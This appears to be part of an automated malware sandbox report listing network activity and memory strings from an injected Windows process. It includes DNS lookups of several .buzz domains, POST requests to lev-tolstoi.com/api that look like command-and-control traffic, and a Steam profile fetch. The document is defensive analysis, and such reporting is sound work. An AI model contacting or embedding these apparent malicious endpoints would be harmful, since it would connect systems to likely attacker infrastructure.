                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: ingreem-eilish.biz
                Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appliacnesot.buzz:443/api
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/?#
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1883574835.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866458834.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiA
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiQ0O0q
                Source: aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api_q
                Source: aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apil
                Source: aspnet_regiis.exe, 00000002.00000003.1883574835.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866458834.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiB
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiZ
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apipi
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prisonyfork.buzz:443/api
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/h
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761739579.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F93000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761459595.0000000004F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761739579.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F93000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761459595.0000000004F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
